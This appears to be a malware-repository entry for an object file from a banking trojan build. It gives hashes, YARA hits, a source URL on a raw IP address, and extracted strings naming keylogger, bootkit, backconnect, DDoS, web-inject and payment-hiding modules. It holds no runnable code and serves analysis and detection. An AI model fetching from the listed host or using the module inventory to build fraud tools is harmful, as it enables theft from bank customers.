Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 18d53adfd756f390c22086b2227c614e --

Hashes
MD5: 18d53adfd756f390c22086b2227c614e
SHA1: bb24e89bbc7376992ea1dba5126f14723366ef15
SHA256: 938eca5ef849929ffe5c30094219c85fc7196178e7b1f01872368a14f8f6a508
SSDEEP: 1536:W7KzEboySdkGa3M/dWwUYwwgeuzSSzDOSnkC+GBJt4+wKSOZygNu9:W7KzEboySyGa3OUgOzSYBJi+wK+
Details
File Type: 80386
Yara Hits
CuckooSandbox/shellcode | CuckooSandbox/embedded_win_api | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/contentis_base64 |
Source
http://103.68.190.250/Sources//Advance/BJWJ/Builds/BOT_PLUG/Objs/Release%20DEBUGCONFIG/BBSCBank.obj
Strings
		.drectve
.debug$S
.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
@@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.text
`.debug$S
B.rdata
0@.text
`.debug$S
B.rdata
0@.rdata
0@.rdata
0@.text
`.debug$S
B.debug$T
B   /DEFAULTLIB:"uuid.lib" /DEFAULTLIB:"uuid.lib" /DEFAULTLIB:"LIBCMT" /DEFAULTLIB:"OLDNAMES" 
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\BBSCBank.obj
Microsoft (R) Optimizing Compiler
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG
D:\Program Files\Microsoft Visual Studio 9.0\VC\bin\cl.exe
-O1 -Oi -Ie:\Projects\progs\Petrosjan\BJWJ\Builds\BootkitDropper -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Misc -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Common -Ie:\Projects\progs\Petrosjan\BJWJ\Source\Core -Ie:\Projects\progs\Petrosjan\BJWJ\Source -Ie:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Modules -Ie:\Projects\progs\Petrosjan\BJWJ\include -Ie:\Projects\progs\Petrosjan\BJWJ\Source\RuBnk -DWIN32 -DNDEBUG -D_WINDOWS -D_USRDLL -DWHITE_JOE_DLL_EXPORTS -DDEBUGCONFIG -DBOTPLUG -D_WINDLL -FD -MT -GS- -Gy -GR- -Fo"e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\\" -Fd"e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\vc90.pdb" -W3 -c -Zi -TP -nologo -errorreport:prompt -I"D:\Program Files\Microsoft Visual Studio 9.0\VC\include" -I"D:\Program Files\Microsoft Visual Studio 9.0\VC\atlmfc\include" -I"C:\Program Files\Microsoft SDKs\Windows\v6.0A\include" -I"C:\Program Files\Microsoft SDKs\Windows\v6.0A\include" -X
..\..\Source\RuBnk\BBSCBank.cpp
e:\Projects\progs\Petrosjan\BJWJ\Builds\BOT_PLUG\Objs\Release DEBUGCONFIG\vc90.pdb
fcmRead
fcmWrite
fcmReadWrite
fcmCreate
PARSE_CANONICALIZE
PARSE_FRIENDLY
PARSE_SECURITY_URL
PARSE_ROOTDOCUMENT
PARSE_DOCUMENT
PARSE_ENCODE
PARSE_DECODE
PARSE_PATH_FROM_URL
PARSE_URL_FROM_PATH
PARSE_MIME
PARSE_SERVER
PARSE_SCHEMA
PARSE_SITE
PARSE_DOMAIN
PARSE_LOCATION
PARSE_SECURITY_DOMAIN
PARSE_ESCAPE
PSU_DEFAULT
ApiCacheSize
BINDSTATUS_FINDINGRESOURCE
QUERY_IS_INSTALLEDENTRY
BINDSTATUS_CONNECTING
BINDSTATUS_REDIRECTING
BINDSTATUS_BEGINDOWNLOADDATA
BINDSTATUS_ENDDOWNLOADDATA
BINDSTATUS_BEGINDOWNLOADCOMPONENTS
BINDSTATUS_INSTALLINGCOMPONENTS
BINDSTATUS_ENDDOWNLOADCOMPONENTS
BINDSTATUS_USINGCACHEDCOPY
BINDSTATUS_SENDINGREQUEST
BINDSTATUS_MIMETYPEAVAILABLE
BINDSTATUS_CACHEFILENAMEAVAILABLE
restAccounts
BINDSTATUS_BEGINSYNCOPERATION
restFixeds
BINDSTATUS_ENDSYNCOPERATION
sizeRestFixeds
BINDSTATUS_BEGINUPLOADDATA
hidePayments
runHideReplacement
BINDSTATUS_ENDUPLOADDATA
BINDSTATUS_PROTOCOLCLASSID
BINDSTATUS_ENCODING
BINDSTATUS_VERIFIEDMIMETYPEAVAILABLE
BINDSTATUS_CLASSINSTALLLOCATION
BINDSTATUS_DECODING
BINDSTATUS_LOADINGMIMEHANDLER
BINDSTATUS_CONTENTDISPOSITIONATTACH
SYS_WIN32
SYS_MAC
BINDSTATUS_CLSIDCANINSTANTIATE
BINDSTATUS_IUNKNOWNAVAILABLE
COOKIE_STATE_REJECT
BINDSTATUS_DIRECTBIND
BINDSTATUS_RAWMIMETYPE
BINDSTATUS_PROXYDETECTING
BINDSTATUS_ACCEPTRANGES
CBank::pHandlerSQLDriverConnectA
BINDSTATUS_COOKIE_SENT
BINDSTATUS_COMPACT_POLICY_RECEIVED
BINDSTATUS_COOKIE_SUPPRESSED
CBank::pHandlerSQLPrepareA
BINDSTATUS_COOKIE_STATE_ACCEPT
BINDSTATUS_COOKIE_STATE_REJECT
BINDSTATUS_COOKIE_STATE_PROMPT
CBank::pHandlerSQLExecDirectA
CBank::pHandlerSQLExecute
BINDSTATUS_PERSISTENT_COOKIE_RECEIVED
BINDSTATUS_CACHECONTROL
BINDSTATUS_CONTENTDISPOSITIONFILENAME
BINDSTATUS_MIMETEXTPLAINMISMATCH
strODBCConnect
BINDSTATUS_PUBLISHERAVAILABLE
BINDSTATUS_DISPLAYNAMEAVAILABLE
domain
FEATURE_OBJECT_CACHING
FEATURE_ZONE_ELEVATION
FEATURE_MIME_HANDLING
FEATURE_MIME_SNIFFING
FEATURE_WINDOW_RESTRICTIONS
FEATURE_WEBOC_POPUPMANAGEMENT
FEATURE_BEHAVIORS
FEATURE_DISABLE_MK_PROTOCOL
FEATURE_LOCALMACHINE_LOCKDOWN
FEATURE_SECURITYBAND
FEATURE_RESTRICT_ACTIVEXINSTALL
FEATURE_RESTRICT_FILEDOWNLOAD
FEATURE_ADDON_MANAGEMENT
FEATURE_PROTOCOL_LOCKDOWN
FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
FEATURE_SAFE_BINDTOOBJECT
FEATURE_UNC_SAVEDFILECHECK
FEATURE_GET_URL_DOM_FILEPATH_UNENCODED
TKIND_INTERFACE
FEATURE_TABBED_BROWSING
FEATURE_SSLUX
TKIND_DISPATCH
FEATURE_DISABLE_NAVIGATION_SOUNDS
FEATURE_DISABLE_LEGACY_COMPRESSION
TKIND_ALIAS
FEATURE_FORCE_ADDR_AND_STATUS
FEATURE_XMLHTTP
FEATURE_DISABLE_TELNET_PROTOCOL
FEATURE_FEEDS
FEATURE_BLOCK_INPUT_PROMPTS
CIP_DISK_FULL
CIP_ACCESS_DENIED
CIP_NEWER_VERSION_EXISTS
CHANGEKIND_ADDMEMBER
CIP_OLDER_VERSION_EXISTS
CIP_NAME_CONFLICT
CHANGEKIND_DELETEMEMBER
CIP_TRUST_VERIFICATION_COMPONENT_MISSING
CHANGEKIND_SETNAMES
CIP_EXE_SELF_REGISTERATION_TIMEOUT
CHANGEKIND_SETDOCUMENTATION
CHANGEKIND_GENERAL
CIP_UNSAFE_TO_ABORT
CHANGEKIND_INVALIDATE
CIP_NEED_REBOOT
CHANGEKIND_CHANGEFAILED
Uri_PROPERTY_STRING_START
Uri_PROPERTY_AUTHORITY
Uri_PROPERTY_DISPLAY_URI
Uri_PROPERTY_STRING_LAST
Uri_PROPERTY_ZONE
Uri_HOST_DNS
Uri_HOST_IPV4
CC_CDECL
CC_MSCPASCAL
CC_PASCAL
CC_MACPASCAL
CC_STDCALL
CC_FPFASTCALL
CC_SYSCALL
CC_MPWCDECL
CC_MPWPASCAL
COR_VERSION_MAJOR_V2
VAR_STATIC
VIDEORECORD_DEFAULT_PORT
VIDEO_FULLSCREEN
VIDEO_ALWAYS
IdleShutdown
URLZONE_INTRANET
NoAccess
ReadWrite
URLZONEREG_DEFAULT
URLZONEREG_HKLM
	'BANKING_SIGNAL_FILE_HASH
BOT_UID
SA_Yes
SA_Maybe
SA_NoAccess
SA_Read
SA_Write
SA_ReadWrite
INTERNET_SCHEME_FTP
INTERNET_SCHEME_RES
ProcessUnknown
VT_BSTR
VT_DISPATCH
HostCheckInterval
VT_RECORD
VT_RESERVED
TYSPEC_MIMETYPE
TYSPEC_FILENAME
TYSPEC_PROGID
TYSPEC_PACKAGENAME
DESCKIND_IMPLICITAPPOBJ
BINDSTRING_POST_COOKIE
BINDSTRING_FLAG_BIND_TO_OBJECT
hmUnknown
EStrFakeDllInstaller
EStrFakeDllCBankFlag
CBankReplacement
CBankFlagUpdate
CBankRestFixed
DLL_KERNEL32
NODE_INVALID
DLL_SHLWAPI
NODE_ELEMENT
NODE_ATTRIBUTE
NODE_TEXT
NODE_CDATA_SECTION
NODE_ENTITY_REFERENCE
DLL_ODBC32
NODE_ENTITY
NODE_COMMENT
NODE_DOCUMENT
NODE_DOCUMENT_TYPE
NODE_DOCUMENT_FRAGMENT
XMLELEMTYPE_DOCUMENT
tagPARAMDESC
tagPARAMDESCEX
SQLINTEGER
tagBINDPTR
LPPARAMDESCEX
CALLCONV
STRING
BINDPTR
TYPEKIND
FUNCKIND
PARAMDESC
tagTLIBATTR
_SYSTEM_STRINGS
ELEMDESC
PMemBlockList
VARIANTARG
SAFEARRAYBOUND
PDWORD
tagELEMDESC
DESCKIND
_PEB_FREE_BLOCK
PHANDLE
TYPEDESC
KSPIN_LOCK
tagEXCEPINFO
PMemBlock
_NT_TIB
tagSTATSTG
VARKIND
_RTL_DRIVE_LETTER_CURDIR
LPOLESTR
tagFUNCDESC
NTSTATUS
tagIDLDESC
_UNICODE_STRING
TMemory
PPEBLOCKROUTINE
LONGLONG
tagApplicationType
HMEMORYMODULE
tagCABSTR
PIDMSI_STATUS_VALUE
LONG_PTR
PROPVAR_PAD3
LPVOID
CBank::RestAccount
CBank::RestAccountFixed
CBank::HidePayment
STRBUF::TStrRec
TRequest
FUNCDESC
TBotApplication
tagCACLSID
tagCADBL
SQLCHAR
_RTL_BITMAP
SIZE_T
BOOLEAN
PTEXT_INFO
KAFFINITY
HREFTYPE
TRequestList
tagTYPEKIND
UNICODE_STRING
tagDESCKIND
tagCACY
tagSYSKIND
_STRING
tagXMLEMEM_TYPE
OLECHAR
tagVARKIND
PPEB_LDR_DATA
EXCEPINFO
LPCSTR
_FILETIME
ULONGLONG
VARDESC
LPCOLESTR
LPCRITICAL_SECTION
IUnknown
MEMBERID
tagARRAYDESC
THTTPResponseRec
DOUBLE
tagVARDESC
TGrabber
tagBINDSTRING
DECIMAL
SQLUSMALLINT
CLIENT_ID
SYSKIND
__MIDL_IUri_0001
TListTemplate<void *>
TBotSocket
BSTRBLOB
tagCAH
_tagQUERYOPTION
TBotEvent
THTTPMethod
_TP_CALLBACK_ENVIRON
_TP_CALLBACK_ENVIRON::<unnamed-type-u>
_TP_CALLBACK_ENVIRON::<unnamed-type-u>::<unnamed-type-s>
ITypeComp
TProcessType
tagCAUI
tagCAFILETIME
tagDISPPARAMS
VARIANT_BOOL
tagSAFEARRAY
PROPVARIANT
LIST_ENTRY
TMemBlock
CAPROPVARIANT
tagTYSPEC
HCRYPTKEY
TMultiPartData
TMultiPartData::TReadPart
TPlugin
tagTYPEDESC
tagCLIPDATA
PSYSTEM_STRINGS
RTL_DRIVE_LETTER_CURDIR
CADATE
tagCAC
THTTPResponse
MemPtr<512>
IDLDESC
PTP_CALLBACK_INSTANCE
tagTYPEATTR
THTTPChunks
THTTPChunks::TState
tagSAFEARRAYBOUND
PWCHAR
HWND__
tagBLOB
THTMLInjectData
LPTSTR
tagURLZONE
_LARGE_INTEGER
_LARGE_INTEGER::<unnamed-type-u>
ReplacesCorHdrNumericDefines
_ULARGE_INTEGER
_ULARGE_INTEGER::<unnamed-type-u>
_PEB_LDR_DATA
ISequentialStream
PRTL_BITMAP
VARENUM
SQLHENV
_CLIENT_ID
PPEB_FREE_BLOCK
tagCAI
TIMESTAMP_STRUCT
tagCAUB
tagFUNCKIND
PCUWSTR
LPSAFEARRAY
TRequestEvent
_URLZONEREG
RTL_CRITICAL_SECTION
VideoLog
THTTPRequest
TListNotifyEvent
tagBSTRBLOB
TLIBATTR
LARGE_INTEGER
IEnumSTATSTG
tagPROCESSENTRY32W
VARTYPE
TBotCollectionItem
TP_VERSION
ITypeLib
TBotStrings
tagDEC
TValue
CLIPDATA
TYPEATTR
tagVARIANT
DISPID
PRTL_CRITICAL_SECTION
vc_attributes::YesNoMaybe
vc_attributes::PreAttribute
vc_attributes::PostAttribute
vc_attributes::AccessType
TIfobsOnlineGrabber
USHORT
THTMLInject
tagCADATE
TBotStream
PRequestList
tagCAUH
ULARGE_INTEGER
IRecordInfo
TKeyLogger
_RTL_CRITICAL_SECTION
ldiv_t
CASCODE
TDataBlock
PPROCESS_PARAMETERS
PRTL_CRITICAL_SECTION_DEBUG
PRequest
CAFILETIME
_CURDIR
TProcessPipe
SQLHANDLE
DISPPARAMS
LPVARIANT
SQLHWND
va_list
TMemoryDLL
INVOKEKIND
STATSTG
SQLRETURN
__MIDL_IUri_0002
_TEXT_INFO
HANDLE
tagCALPWSTR
NT_TIB
HCRYPTPROV
_tagPSUACTION
PROPVAR_PAD1
CALPSTR
HCRYPTHASH
PTP_POOL
LPBYTE
SAFEARRAY
PProcessPipe
tagCABOOL
_RTL_CRITICAL_SECTION_DEBUG
IStorage
TWinCrypt
CALPWSTR
PUWSTR
TString<char>
TBotList
tagTIMESTAMP_STRUCT
TBotObject
PStrings
_LIST_ENTRY
tagCALPSTR
TEventContainer
ITypeInfo
LPWSTR
LPVERSIONEDSTREAM
IStream
size_t
PHTTPResponseRec
CURDIR
_PROCESS_PARAMETERS
tagPROPVARIANT
INTERNET_SCHEME
InternetCookieState
CABSTRBLOB
TBotFileStream
tagVersionedStream
SQLSMALLINT
SQLUINTEGER
TCryptHTTP
FILETIME
tagCAFLT
tagCACLIPDATA
TDllId
tagBINDSTATUS
VARIANT
IDispatch
tagDOMNodeType
tagShutdownType
tagCAL
tagCAPROPVARIANT
fwsprintfA
tagCABSTRBLOB
THTMLInjectList
PTP_SIMPLE_CALLBACK
tagCHANGEKIND
CACLIPDATA
PTP_CLEANUP_GROUP_CANCEL_CALLBACK
TValues
PTP_CALLBACK_ENVIRON
PTP_CLEANUP_GROUP
CACLSID
PROCESSENTRY32W
ULONG_PTR
SQLHSTMT
STRUTILS<char>
LPCTSTR
PROPVAR_PAD2
_ldiv_t
__MIDL_ICodeInstall_0001
SQLHDBC
TMultiPartDataItem
HRESULT
TBotCollection
tagCALLCONV
_tagINTERNETFEATURELIST
CABOOL
string
_tagPARSEACTION
TStrEnum
tagCASCODE
tagCAUL
CABSTR
wn:ph>
Iakytp[O:ac
Y./Pxx
6rUo6A
YZz%.J	
e:\projects\progs\petrosjan\bjwj\source\misc\grabber.h
c:\program files\microsoft sdks\windows\v6.0a\include\mmsystem.h
e:\projects\progs\petrosjan\bjwj\source\misc\certgrab.h
e:\projects\progs\petrosjan\bjwj\source\common\task.h
c:\program files\microsoft sdks\windows\v6.0a\include\msxml.h
c:\program files\microsoft sdks\windows\v6.0a\include\cguid.h
e:\projects\progs\petrosjan\bjwj\source\common\cabpacker.h
c:\program files\microsoft sdks\windows\v6.0a\include\fci.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnetwk.h
d:\program files\microsoft visual studio 9.0\vc\include\fcntl.h
c:\program files\microsoft sdks\windows\v6.0a\include\nb30.h
e:\projects\progs\petrosjan\bjwj\source\core\botdebug.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\finam.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcdcep.h
e:\projects\progs\petrosjan\bjwj\source\core\bothttp.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqlext.h
c:\program files\microsoft sdks\windows\v6.0a\include\winefs.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bss.h
e:\projects\progs\petrosjan\bjwj\source\core\botsocket.h
c:\program files\microsoft sdks\windows\v6.0a\include\sql.h
e:\projects\progs\petrosjan\bjwj\source\common\unhook.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqltypes.h
c:\program files\microsoft sdks\windows\v6.0a\include\mcx.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\rubnk.h
e:\projects\progs\petrosjan\bjwj\builds\bot_plug\modules\modules.h
e:\projects\progs\petrosjan\bjwj\source\common\internetexplorer.h
d:\program files\microsoft visual studio 9.0\vc\include\io.h
c:\program files\microsoft sdks\windows\v6.0a\include\wininet.h
d:\program files\microsoft visual studio 9.0\vc\include\vadefs.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnt.h
d:\program files\microsoft visual studio 9.0\vc\include\ctype.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bbscbank.cpp
c:\program files\microsoft sdks\windows\v6.0a\include\wincon.h
e:\projects\progs\petrosjan\bjwj\source\core\dllloader.h
e:\projects\progs\petrosjan\bjwj\source\common\wndutils.h
e:\projects\progs\petrosjan\bjwj\source\core\botutils.h
c:\program files\microsoft sdks\windows\v6.0a\include\guiddef.h
e:\projects\progs\petrosjan\bjwj\source\core\inject.h
c:\program files\microsoft sdks\windows\v6.0a\include\oaidl.h
e:\projects\progs\petrosjan\bjwj\source\core\bothosts.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpc.h
c:\program files\microsoft sdks\windows\v6.0a\include\winerror.h
e:\projects\progs\petrosjan\bjwj\source\misc\cyberplatdll.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcdce.h
c:\program files\microsoft sdks\windows\v6.0a\include\wingdi.h
e:\projects\progs\petrosjan\bjwj\source\common\opera.h
c:\program files\microsoft sdks\windows\v6.0a\include\winbase.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\sber.h
c:\program files\microsoft sdks\windows\v6.0a\include\tlhelp32.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack8.h
e:\projects\progs\petrosjan\bjwj\source\core\splice.h
e:\projects\progs\petrosjan\bjwj\source\common\keepalive.h
c:\program files\microsoft sdks\windows\v6.0a\include\sqlucode.h
e:\projects\progs\petrosjan\bjwj\source\core\installer.h
e:\projects\progs\petrosjan\bjwj\source\common\botconfig.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack4.h
d:\program files\microsoft visual studio 9.0\vc\include\string.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\java_patcher.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsock.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\javaclient2015saver.h
c:\program files\microsoft sdks\windows\v6.0a\include\winreg.h
e:\projects\progs\petrosjan\bjwj\source\common\keylogger.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\tiny.h
c:\program files\microsoft sdks\windows\v6.0a\include\propidl.h
c:\program files\microsoft sdks\windows\v6.0a\include\ole2.h
e:\projects\progs\petrosjan\bjwj\source\common\hostsautoupdate.h
c:\program files\microsoft sdks\windows\v6.0a\include\objbase.h
e:\projects\progs\petrosjan\bjwj\source\core\dbgtemplates.h
e:\projects\progs\petrosjan\bjwj\source\common\videorecorder.h
e:\projects\progs\petrosjan\bjwj\source\common\universalkeylogger.h
d:\program files\microsoft visual studio 9.0\vc\include\stdlib.h
e:\projects\progs\petrosjan\bjwj\source\common\firefox.h
e:\projects\progs\petrosjan\bjwj\source\core\botclasses.h
d:\program files\microsoft visual studio 9.0\vc\include\limits.h
c:\program files\microsoft sdks\windows\v6.0a\include\winspool.h
c:\program files\microsoft sdks\windows\v6.0a\include\poppack.h
e:\projects\progs\petrosjan\bjwj\source\misc\ftpsniffer.h
e:\projects\progs\petrosjan\bjwj\source\common\requests.h
e:\projects\progs\petrosjan\bjwj\source\core\crypt.h
c:\program files\microsoft sdks\windows\v6.0a\include\prsht.h
e:\projects\progs\petrosjan\bjwj\source\misc\coocksol.h
c:\program files\microsoft sdks\windows\v6.0a\include\winver.h
c:\program files\microsoft sdks\windows\v6.0a\include\tvout.h
c:\program files\microsoft sdks\windows\v6.0a\include\imm.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnterr.h
c:\program files\microsoft sdks\windows\v6.0a\include\commdlg.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcasync.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnsi.h
e:\projects\progs\petrosjan\bjwj\source\core\plugins.h
c:\program files\microsoft sdks\windows\v6.0a\include\winperf.h
c:\program files\microsoft sdks\windows\v6.0a\include\shellapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\dlgs.h
c:\program files\microsoft sdks\windows\v6.0a\include\winscard.h
c:\program files\microsoft sdks\windows\v6.0a\include\urlmon.h
c:\program files\microsoft sdks\windows\v6.0a\include\wtypes.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsmcrd.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcndr.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcnsip.h
c:\program files\microsoft sdks\windows\v6.0a\include\winnls.h
c:\program files\microsoft sdks\windows\v6.0a\include\servprov.h
e:\projects\progs\petrosjan\bjwj\source\core\odbc.h
c:\program files\microsoft sdks\windows\v6.0a\include\bcrypt.h
e:\projects\progs\petrosjan\bjwj\source\misc\killos_reboot.h
c:\program files\microsoft sdks\windows\v6.0a\include\stralign.h
c:\program files\microsoft sdks\windows\v6.0a\include\lzexpand.h
c:\program files\microsoft sdks\windows\v6.0a\include\ddeml.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings.h
e:\projects\progs\petrosjan\bjwj\source\misc\backconnect.h
c:\program files\microsoft sdks\windows\v6.0a\include\wincrypt.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_adt.h
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack2.h
c:\program files\microsoft sdks\windows\v6.0a\include\reason.h
c:\program files\microsoft sdks\windows\v6.0a\include\winsvc.h
c:\program files\microsoft sdks\windows\v6.0a\include\ncrypt.h
e:\projects\progs\petrosjan\bjwj\source\core\botcore.h
e:\projects\progs\petrosjan\bjwj\source\core\config.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_strict.h
e:\projects\progs\petrosjan\bjwj\source\core\ntdll.h
c:\program files\microsoft sdks\windows\v6.0a\include\psapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\specstrings_undef.h
e:\projects\progs\petrosjan\bjwj\source\core\ntstatus.h
c:\program files\microsoft sdks\windows\v6.0a\include\basetsd.h
e:\projects\progs\petrosjan\bjwj\source\core\utils.h
e:\projects\progs\petrosjan\bjwj\source\core\strings.h
e:\projects\progs\petrosjan\bjwj\source\core\memory.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bootkit.h
e:\projects\progs\petrosjan\bjwj\source\misc\keylogsystems.h
c:\program files\microsoft sdks\windows\v6.0a\include\winioctl.h
c:\program files\microsoft sdks\windows\v6.0a\include\oleauto.h
e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
c:\program files\microsoft sdks\windows\v6.0a\include\winuser.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ibanksystem.h
e:\projects\progs\petrosjan\bjwj\source\misc\bsssign.h
c:\program files\microsoft sdks\windows\v6.0a\include\rpcsal.h
c:\program files\microsoft sdks\windows\v6.0a\include\cderr.h
c:\program files\microsoft sdks\windows\v6.0a\include\ktmtypes.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\avangard.h
c:\program files\microsoft sdks\windows\v6.0a\include\dde.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bsssendfile.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ifobs.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\bbscbank.h
c:\program files\microsoft sdks\windows\v6.0a\include\windows.h
c:\program files\microsoft sdks\windows\v6.0a\include\sdkddkver.h
d:\program files\microsoft visual studio 9.0\vc\include\excpt.h
e:\projects\progs\petrosjan\bjwj\source\common\pipes.h
e:\projects\progs\petrosjan\bjwj\source\core\strimplementation.cpp
d:\program files\microsoft visual studio 9.0\vc\include\crtdefs.h
d:\program files\microsoft visual studio 9.0\vc\include\sal.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\yandex.h
e:\projects\progs\petrosjan\bjwj\source\core\botcrypthttp.h
c:\program files\microsoft sdks\windows\v6.0a\include\objidl.h
d:\program files\microsoft visual studio 9.0\vc\include\codeanalysis\sourceannotations.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\rafa.h
e:\projects\progs\petrosjan\bjwj\source\misc\ddos.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\azconfig.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\ifobsonline.h
e:\projects\progs\petrosjan\bjwj\source\misc\hunter.h
e:\projects\progs\petrosjan\bjwj\source\rubnk\javaconfig.h
e:\projects\progs\petrosjan\bjwj\source\misc\javaappletgrabbers.h
d:\program files\microsoft visual studio 9.0\vc\include\stdarg.h
e:\projects\progs\petrosjan\bjwj\source\core\strconsts.h
e:\projects\progs\petrosjan\bjwj\source\core\listtemplate.cpp
c:\program files\microsoft sdks\windows\v6.0a\include\pshpack1.h
c:\program files\microsoft sdks\windows\v6.0a\include\windef.h
c:\program files\microsoft sdks\windows\v6.0a\include\oleidl.h
c:\program files\microsoft sdks\windows\v6.0a\include\unknwn.h
c:\program files\microsoft sdks\windows\v6.0a\include\inaddr.h
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4 + =
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4 + = $ebx $T0 4 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 24 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 40 - ^ =
$T0 $ebp 116 + = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + =
$T0 $ebp 116 + = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 200 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 544 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 108 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 36 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 324 - ^ =
$T0 $ebp = $eip $T0 4 + ^ = $ebp $T0 ^ = $esp $T0 8 + = $L $T0 .cbSavedRegs - = $P $T0 8 + .cbParams + = $ebx $T0 264 - ^ =
TBotObject::~TBotObject
TBotObject::`scalar deleting destructor'
